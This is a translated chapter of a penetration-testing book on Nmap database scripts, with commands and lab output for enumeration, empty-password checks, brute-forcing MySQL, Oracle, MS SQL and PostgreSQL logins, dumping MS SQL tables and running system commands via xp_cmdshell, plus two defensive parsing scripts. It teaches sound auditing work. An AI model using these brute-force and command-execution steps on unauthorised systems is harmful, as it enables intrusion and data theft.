Key points of this chapter
This chapter introduces the use of Nmap scripts for database penetration testing. Nmap scripts touch on almost every kind of application, and support for databases is naturally no exception. After studying this chapter, the reader will understand what Nmap can do for database security.
Scripts used in this chapter
Table 8.1 lists the Nmap commands needed for this chapter; the author has collected them here for the reader's convenience.
Table 8.1 Script options (names) needed for this chapter

| Script | Description |
|---|---|
| mysql-databases | Enumerate MySQL databases |
| mysql-variables | List MySQL variables |
| mysql-empty-password | Check MySQL passwords |
| mysql-brute | Audit MySQL passwords |
| mysql-audit | Audit MySQL security configuration |
| oracle-brute | Audit Oracle passwords |
| ms-sql-brute | Audit MS SQL passwords |
| ms-sql-empty-password | Check for empty MS SQL passwords |
| ms-sql-tables | Read MS SQL data |
| ms-sql-xp-cmdshell | Execute system commands via MS SQL |
| pgsql-brute | Audit PgSQL passwords |
Table 8.2 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: mysql-databases, enumerate MySQL databases.
Run the command `nmap -p3306 --script mysql-databases --script-args mysqluser=root,mysqlpass target` to enumerate the MySQL databases.
```
root@Wing:~# nmap -p3306 --script mysql-databases --script-args mysqluser=root,mysqlpass 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:20 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql
| test
| cmcc
|_ information_schema
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
root@Wing:~#
```
If we already know the target MySQL account and password, we can easily obtain all of the target's databases. If the target's database port has been changed, we use the -p parameter to specify the corresponding port; mysqluser specifies the target database account and mysqlpass the target database password (if the password is empty, nothing needs to be filled in after it), and the target IP address comes last.
```
root@Wing:~# nmap -p3310 --script mysql-databases --script-args mysqluser=root,mysqlpass 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:32 CST
Nmap scan report for 192.168.84.1
Host is up (0.0017s latency).
PORT STATE SERVICE
3310/tcp open dyna-access
| mysql
| test
| cmcc
|_ information_schema
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
root@Wing:~#
```
From the result above, the target MySQL instance has four databases: mysql, test, cmcc and information_schema. We could also connect to the target database directly to look, but that requires a suitable client environment, whereas using the Nmap script is very convenient. This capability is not unique to Nmap: Metasploit also has a corresponding module for listing databases.
When an Nmap command is long enough to span several lines, there is no need to press Enter to break it; the multi-line input is wrapped automatically.
Table 8.3 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: mysql-variables, list MySQL variables.
Run the command `nmap -p3306 --script=mysql-variables target` to list the target's MySQL variables.
```
root@Wing:~# nmap -p3306 --script=mysql-variables 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:39 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-variables:
| auto_increment_increment: 1
| auto_increment_offset: 1
| automatic_sp_privileges: ON
| back_log: 50
| basedir: /usr/
| binlog_cache_size: 32768
| bulk_insert_buffer_size: 8388608
| character_set_client: latin1
| character_set_connection: latin1
| character_set_database: latin1
| .
| .
| .
| version_comment: (Debian)
| version_compile_machine: powerpc
| version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@Wing:~#
```
The mysql-variables script makes it easy to query all of the MySQL server's variables. If the target port has been changed, use -p to specify the corresponding port.
```
root@Wing:~# nmap -p3310 --script=mysql-variables 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:41 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT STATE SERVICE
3310/tcp open mysql
| mysql-variables:
| auto_increment_increment: 1
| auto_increment_offset: 1
| automatic_sp_privileges: ON
| back_log: 50
| basedir: /usr/
| binlog_cache_size: 32768
| bulk_insert_buffer_size: 8388608
| character_set_client: latin1
| character_set_connection: latin1
| character_set_database: latin1
| .
| .
| .
| version_comment: (Debian)
| version_compile_machine: powerpc
| version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
root@Wing:~#
```
If the port still cannot be determined, scan the ports with -sV.
```
root@Wing:~# nmap -sV --script=mysql-variables 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:42 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open ssl/http Apache httpd 2.2.9 ((APMServ)mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
445/tcp open netbios-ssn
514/tcp filtered shell
843/tcp open unknown
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1037/tcp open msrpc Microsoft Windows RPC
1038/tcp open msrpc Microsoft Windows RPC
1169/tcp open tripwire?
3306/tcp open mysql MySQL (unauthorized)
5678/tcp open rrac?
7000/tcp open afs3-fileserver?
8000/tcp open tcpwrapped
10000/tcp open snet-sensor-mgmt?
| mysql-variables:
| auto_increment_increment: 1
| auto_increment_offset: 1
| automatic_sp_privileges: ON
| back_log: 50
| basedir: /usr/
| binlog_cache_size: 32768
| bulk_insert_buffer_size: 8388608
| character_set_client: latin1
| character_set_connection: latin1
| character_set_database: latin1
| .
| .
| .
| version_comment: (Debian)
| version_compile_machine: powerpc
| version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 298.43 seconds
root@Wing:~#
```
Using -sV takes considerably longer.
If you need to set the target's account and password, add the mysql-brute or mysql-empty-password script to specify the account and password.
Table 8.4 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: mysql-empty-password, check MySQL passwords.
Run the command `nmap -p3306 --script=mysql-empty-password target` to check the password of the target MySQL service.
```
root@Wing:~# nmap -p3306 --script=mysql-empty-password 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:46 CST
Nmap scan report for 192.168.84.1
Host is up (0.0017s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-empty-password:
| anonymous account has empty password
|_ root account has empty password
Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
root@Wing:~#
```
This script checks whether the MySQL password is empty, whether the password is root, or whether anonymous login is allowed; it is a MySQL security check script. From the result returned above, the target MySQL database's password is empty, so it can be logged into by anyone without restriction.
If you cannot determine which port the target has open, scan with the -sV option.
```
root@Wing:~# nmap -sV --script=mysql-empty-password 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:53 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open ssl/http Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
445/tcp open netbios-ssn
514/tcp filtered shell
843/tcp open unknown
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1037/tcp open msrpc Microsoft Windows RPC
1038/tcp open msrpc Microsoft Windows RPC
1169/tcp open tripwire?
3306/tcp open mysql MySQL (unauthorized)
|_mysql-empty-password: Host 'pgos' is not allowed to connect to this MySQL server
5678/tcp open rrac?
7000/tcp open afs3-fileserver?
8000/tcp open tcpwrapped
10000/tcp open snet-sensor-mgmt?
| mysql-empty-password:
| anonymous account has empty password
|_ root account has empty password
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 296.45 seconds
root@Wing:~#
```
If you know the port number, specify it with the -p option.
In general we use options such as -F and -T4 to scan the target's ports quickly rather than going straight to -sV; using -sV directly skips over the information-gathering step.
Table 8.5 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: mysql-brute, audit MySQL passwords.
Run the command `nmap --script=mysql-brute target` to audit the target's MySQL passwords.
```
root@Wing:~# nmap --script=mysql-brute 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:59 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
514/tcp filtered shell
843/tcp open unknown
902/tcp open iss-realsecure
912/tcp open apex-mesh
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1029/tcp open ms-lsa
1037/tcp open ams
1038/tcp open mtqp
1169/tcp open tripwire
3306/tcp open mysql
| mysql-brute:
| Accounts
| root:root - Valid credentials
5678/tcp open rrac
7000/tcp open afs3-fileserver
8000/tcp open http-alt
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 271.00 seconds
root@Wing:~#
```
This script tests MySQL for weak passwords. By default Nmap scans all ports to find the MySQL port, but we can use the -p option to specify a single port, and we can also supply our own username and password dictionaries.
```
root@linux:/usr/share/nmap/scripts# nmap -p 3306 --script=mysql-brute userdb=/root/ passdb.txt passdb=/root/pass.txt 192.168.0.110
Starting Nmap 6.25 ( http://nmap.org ) at 2014-06-12 21:50 CST
Illegal netmask value, must be /0 - /32 . Assuming /32 (one host)
Failed to resolve given hostname/IP: userdb=. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges. If the machine only has an IPv6 address, add the Nmap -6 flag to scan that.
…omitted…
3306/tcp open mysql
| mysql-brute:
| Accounts
| root:root - Valid credentials
Nmap done: 1 IP address (1 host up) scanned in 163.77 seconds
```
Table 8.6 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: mysql-audit, audit MySQL security configuration.
Run the command `nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='nselib/data/mysql-cis.audit'" target` to audit the MySQL security configuration.
```
root@Wing:~# nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='nselib/data/mysql-cis.audit'" 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:13 CST
Nmap scan report for 192.168.84.1
Host is up (0.0025s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-audit:
| CIS MySQL Benchmarks v1.0.2
| 3.1: Skip symbolic links => PASS
| 3.2: Logs not on system partition => PASS
| 3.2: Logs not on database partition => PASS
| 4.1: Supported version of MySQL => REVIEW
| Version: 5.1.54-1ubuntu4
| 4.4: Remove test database => PASS
| 4.5: Change admin account name => FAIL
| 4.7: Verify Secure Password Hashes => PASS
| 4.9: Wildcards in user hostname => FAIL
| The following users were found with wildcards in hostname
| root
| super
| super2
| 4.10: No blank passwords => PASS
| 4.11: Anonymous account => PASS
| 5.1: Access to mysql database => REVIEW
| Verify the following users that have access to the MySQL database
| user host
| root localhost
| root patrik-11
| root 127.0.0.1
| debian-sys-maint localhost
| root %
| super %
| 5.2: Do not grant FILE privileges to non Admin users => REVIEW
| The following users were found having the FILE privilege
| super
| super2
| 5.3: Do not grant PROCESS privileges to non Admin users => REVIEW
| The following users were found having the PROCESS privilege
| super
| 5.4: Do not grant SUPER privileges to non Admin users => REVIEW
| The following users were found having the SUPER privilege
| super
| 5.5: Do not grant SHUTDOWN privileges to non Admin users => REVIEW
| The following users were found having the SHUTDOWN privilege
| super
| 5.6: Do not grant CREATE USER privileges to non Admin users => REVIEW
| The following users were found having the CREATE USER privilege
| super
| 5.7: Do not grant RELOAD privileges to non Admin users => REVIEW
| The following users were found having the RELOAD privilege
| super
| 5.8: Do not grant GRANT privileges to non Admin users => PASS
| 6.2: Disable Load data local => FAIL
| 6.3: Disable old password hashing => PASS
| 6.4: Safe show database => FAIL
| 6.5: Secure auth => FAIL
| 6.6: Grant tables => FAIL
| 6.7: Skip merge => FAIL
| 6.8: Skip networking => FAIL
| 6.9: Safe user create => FAIL
| 6.10: Skip symbolic links => FAIL
|
|_ The audit was performed using the db-account: root
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
root@Wing:~#
```
The mysql-audit script audits MySQL's security configuration. The -p parameter specifies the target port (if the port cannot be determined, scan with -sV); mysql-audit.username specifies the target database account and mysql-audit.password the target database password; if the password is empty, leave that option empty.
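As an added example (not from the book), a small shell parser for the mysql-audit output format shown above: it reads saved Nmap normal output on stdin, extracts each CIS check with its PASS/REVIEW/FAIL result, and provides a gate that fails when any check is FAIL, so the audit can drive a hardening job instead of being read by eye. The sample output in the block is constructed from the format above, not a real scan.

```shell
#!/bin/sh
# Constructed sample of mysql-audit output (same format as the book's scan, shortened).
MYSQL_AUDIT_SAMPLE='| mysql-audit:
|   CIS MySQL Benchmarks v1.0.2
|   3.1: Skip symbolic links => PASS
|   4.1: Supported version of MySQL => REVIEW
|     Version: 5.1.54-1ubuntu4
|   4.5: Change admin account name => FAIL
|   4.9: Wildcards in user hostname => FAIL
|     The following users were found with wildcards in hostname
|       root
|   4.10: No blank passwords => PASS
|   6.2: Disable Load data local => FAIL
|   6.8: Skip networking => FAIL
|
|_  The audit was performed using the db-account: root'

# audit_parse: read mysql-audit output on stdin, print "RESULT<TAB>check" per check line.
# Detail lines (versions, user lists, the trailing db-account note) carry no " => " and are skipped.
audit_parse() {
  awk '
    /^[|]/ {
      line = $0
      sub(/^[|]_?[ \t]*/, "", line)      # drop the "|   " / "|_  " NSE prefix
      n = index(line, " => ")
      if (n == 0) next
      printf "%s\t%s\n", substr(line, n + 4), substr(line, 1, n - 1)
    }'
}

# audit_items RESULT: list the checks with the given result (PASS, REVIEW or FAIL).
audit_items() {
  audit_parse | awk -F '\t' -v want="$1" '$1 == want { print $2 }'
}

# audit_summary: one-line count of results, e.g. "PASS=2 REVIEW=1 FAIL=4".
audit_summary() {
  audit_parse | awk -F '\t' '{ c[$1]++ }
    END { printf "PASS=%d REVIEW=%d FAIL=%d\n", c["PASS"], c["REVIEW"], c["FAIL"] }'
}

# audit_gate: succeed only when no check is FAIL, so a hardening job can stop on regressions.
audit_gate() {
  [ "$(audit_items FAIL | awk 'END { print NR }')" -eq 0 ]
}

# Stand-alone demonstration on the constructed sample.
printf '%s\n' "$MYSQL_AUDIT_SAMPLE" | audit_summary
printf '%s\n' "$MYSQL_AUDIT_SAMPLE" | audit_items FAIL
printf '%s\n' "$MYSQL_AUDIT_SAMPLE" | audit_gate || echo "hardening gate: FAIL items present"
```

To use it on a real scan, save the scan with `-oN` and feed that file to the functions on stdin.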
Table 8.7 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: oracle-brute, audit Oracle passwords.
Run the command `nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test target` to audit Oracle passwords.
```
root@Wing:~# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test 192.168.126.131
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:29 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
| Accounts
| system:powell => Account locked
| haxxor:haxxor => Valid credentials
| Statistics
|_ Perfomed 157 guesses in 8 seconds, average tps: 19
Nmap done: 1 IP address (1 host up) scanned in 263.39 seconds
root@Wing:~#
```
The oracle-brute script brute-forces Oracle passwords; -p points to the target port. To brute-force with custom username and password dictionaries, specify the username list with the userdb option and the password list with passdb.
```
root@Wing:~# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test --script-args userdb=/tmp/usernames.txt,passdb=/tmp/passwords.txt 192.168.126.131
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:29 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
| Accounts
| system:powell => Account locked
| haxxor:haxxor => Valid credentials
| Statistics
|_ Perfomed 157 guesses in 8 seconds, average tps: 19
Nmap done: 1 IP address (1 host up) scanned in 393.56 seconds
root@Wing:~#
```
Table 8.8 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: ms-sql-brute, audit MS SQL passwords.
Run the command `nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt,passdb=pass.txt target` to audit MS SQL passwords.
```
root@Wing:~# nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt,passdb=pass.txt 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:44 PDT
Nmap scan report for 192.168.84.1
Host is up (0.00021s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-brute:
|_ sa:123456 => Login Success
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
root@Wing:~#
```
Table 8.9 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: ms-sql-empty-password, check for empty MS SQL passwords.
Run the command `nmap -p 1433 --script ms-sql-empty-password target` to check for an empty MS SQL password.
```
root@Wing:~# nmap -p 1433 --script ms-sql-empty-password 192.168.126.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 22:03 CST
Nmap scan report for 192.168.126.1
Host is up (0.00027s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
| [192.168.126.1\PROD]
|_ sa:<empty> => Login Success
Nmap done: 1 IP address (1 host up) scanned in 231.16 seconds
root@Wing:~#
```
The ms-sql-empty-password script checks for an empty MS SQL password. The result above shows that the target host's MS SQL password is empty and that the login succeeded; the script's default account is sa.
Table 8.10 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: ms-sql-tables, read MS SQL data.
Run the command `nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=sa target` to read MS SQL data.
```
root@Wing:~# nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=sa 192.168.126.131
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:51 PDT
Nmap scan report for 192.168.126.131
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-tables:
| pen
| table column type length
| ===== ====== ==== ======
| products id int 4
| products prodName varchar 50
| users userId int 4
| users sername varchar 50
| users userPass varchar 20
|
| Restrictions
| Output restricted to 2 tables (see mssql-tables.maxtables)
| Output restricted to 5 databases (see mssql-tables.maxdb)
|_ No filter (see mssql-tables.keywords)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@Wing:~#
```
The ms-sql-tables script reads data from MS SQL: -p specifies the target port, and the mssql.username and mssql.password options specify the account and password respectively. With this script, Nmap reads out the corresponding data with ease.
Table 8.11 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: ms-sql-xp-cmdshell, execute system commands via MS SQL.
Run the command `nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" target` to execute a system command through MS SQL.
```
root@Wing:~# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.126.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:55 PDT
Nmap scan report for 192.168.126.1
Host is up (0.00027s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell: (Use --script-args=mssql-xp-cmdshell.cmd='<CMD>' to change command.)
| ipconfig /all
| output
| ======
|
| Windows IP Configuration
|
| Host Name . . . . . . . . . . . . : wing
| Primary Dns Suffix . . . . . . . :
| Node Type . . . . . . . . . . . . : Hybrid
| IP Routing Enabled. . . . . . . . : No
| WINS Proxy Enabled. . . . . . . . : No
| DNS Suffix Search List. . . . . . : localdomain
|
| Ethernet adapter ,0\xDE\xA5:
|
| Connection-specific DNS Suffix . : localdomain
| Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
| Physical Address. . . . . . . . . : 00-0D-29-06-18-F3
| DHCP Enabled. . . . . . . . . . . : Yes
| Autoconfiguration Enabled . . . . : Yes
| IP Address. . . . . . . . . . . . : 192.168.126.1
| Subnet Mask . . . . . . . . . . . : 255.255.255.0
| Default Gateway . . . . . . . . . : 192.168.126.1
| DHCP Server . . . . . . . . . . . : 192.168.126.2
| DNS Servers . . . . . . . . . . . : 192.168.126.1
| Primary WINS Server . . . . . . . : 192.168.126.1
|_
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
root@Wing:~#
```
With the ms-sql-xp-cmdshell script, when the account's privileges are high enough we can execute system commands; even adding and deleting administrator accounts executes reliably. To run this command you must confirm that the target server exposes the MS SQL service port and that you know the account and password for the connection.
Table 8.12 is the chapter's Nmap command table once more (identical to Table 8.1), with this section's command in bold: pgsql-brute, audit PgSQL passwords.
Run the command `nmap -p 5432 --script pgsql-brute target` to audit PgSQL passwords.
```
root@Wing:~# nmap -p 5432 --script pgsql-brute 192.168.126.131
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-13 13:58 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT STATE SERVICE
5432/tcp open pgsql
| pgsql-brute:
| root:<empty> => Valid credentials
|_ test:test => Valid credentials
MAC Address: 00:0C:29:E0:2E:76 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
root@Wing:~#
```
The pgsql-brute script is an efficient password-auditing tool for PgSQL databases, used to check for weak passwords and similar issues.
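The credential checks in this chapter (mysql-empty-password, mysql-brute, oracle-brute, ms-sql-brute, ms-sql-empty-password and pgsql-brute) each print their hits in a slightly different form. As an added example, not from the book, the shell function below normalises saved Nmap normal output from those scripts into one line per affected account (host, port, script, user, finding), recording only whether the password was empty or a weak guessed one so that the triage list never carries plaintext passwords. The input in the block is constructed from the formats shown in this chapter, not a real scan, and hosts are assumed to be reported as bare IP addresses.

```shell
#!/bin/sh
# Constructed sample: excerpts in the formats the chapter's scripts print (not a real scan).
NMAP_DB_SAMPLE='Nmap scan report for 192.168.84.1
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-empty-password:
|   anonymous account has empty password
|_  root account has empty password
| mysql-brute:
|   Accounts
|     root:root - Valid credentials
Nmap scan report for 192.168.126.131
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password:
|   [192.168.126.131\PROD]
|_  sa:<empty> => Login Success
1521/tcp open  oracle
| oracle-brute:
|   Accounts
|     system:powell => Account locked
|     haxxor:haxxor => Valid credentials
5432/tcp open  postgresql
| pgsql-brute:
|   root:<empty> => Valid credentials
|_  test:test => Valid credentials'

# db_cred_findings: read Nmap normal output on stdin and print one tab-separated
# line per usable account: host, port, script, user, empty-password|weak-password.
# "Account locked" and other non-success lines are ignored; passwords are never echoed.
db_cred_findings() {
  awk '
    /^Nmap scan report for / { host = $NF; next }          # assumes a bare IP (no hostname)
    /^[0-9]+\/tcp/           { split($1, p, "/"); port = p[1]; next }
    # "| script-name:" header (also "|_script-name: message"); "user:pass" lines do not
    # match because a non-blank character follows the colon.
    /^[|]_?[ \t]*[a-z0-9-]+:([ \t]|$)/ {
      s = $0; sub(/^[|]_?[ \t]*/, "", s); sub(/:.*/, "", s); script = s; next
    }
    /account has empty password/ {
      s = $0; sub(/^[|]_?[ \t]*/, "", s); split(s, w, " ")
      printf "%s\t%s\t%s\t%s\tempty-password\n", host, port, script, w[1]; next
    }
    /Valid credentials|Login Success/ {
      s = $0; sub(/^[|]_?[ \t]*/, "", s)
      c = index(s, ":"); user = substr(s, 1, c - 1); pw = substr(s, c + 1)
      sub(/ (-|=>) .*$/, "", pw)                           # pw is the guessed secret
      kind = (pw == "<empty>") ? "empty-password" : "weak-password"
      printf "%s\t%s\t%s\t%s\t%s\n", host, port, script, user, kind
    }'
}

# db_cred_summary: count findings by kind, e.g. "empty-password=4 weak-password=3".
db_cred_summary() {
  db_cred_findings | awk -F '\t' '{ c[$5]++ }
    END { printf "empty-password=%d weak-password=%d\n", c["empty-password"], c["weak-password"] }'
}

# Stand-alone demonstration on the constructed sample.
printf '%s\n' "$NMAP_DB_SAMPLE" | db_cred_findings
printf '%s\n' "$NMAP_DB_SAMPLE" | db_cred_summary
```

When a -sV scan attributes a script result to a different port than the service's (as in the mysql-empty-password output earlier in this chapter), the port column reflects what Nmap printed, so verify it against the service line before filing a ticket.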